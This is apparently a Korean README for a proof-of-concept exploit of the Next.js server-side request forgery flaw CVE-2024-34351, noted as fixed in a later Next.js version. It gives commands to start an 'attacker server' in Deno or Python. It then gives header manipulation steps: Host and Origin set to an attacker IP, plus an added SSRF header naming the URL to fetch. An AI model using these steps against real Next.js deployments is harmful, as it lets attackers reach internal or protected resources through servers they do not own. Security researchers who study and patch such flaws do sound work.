
NextJS SSRF(CVE-2024-34351) 전체 악용 PoC
NextJS SSRF의 완전한 익스플로잇을 위한 PoC입니다. 공격자는 CVE-2024-34351 취약점을 사용하여 Next.js 서버에서 모든 웹사이트 콘텐츠를 가져올 수 있습니다. 이 취약점은 [email protected]에서 수정되었습니다.
deno run --allow-net --allow-read attacker-server.ts
python3 attacker-server.py
Host 헤더를 공격자 서버로 수정합니다. (예: Host: 192.198.0.144:8000)Origin 헤더를 공격자 서버로 수정합니다. (예: Origin: http://192.198.0.144:8000/)SSRF라는 새 헤더를 추가합니다. (예: SSRF: http://example.com/test)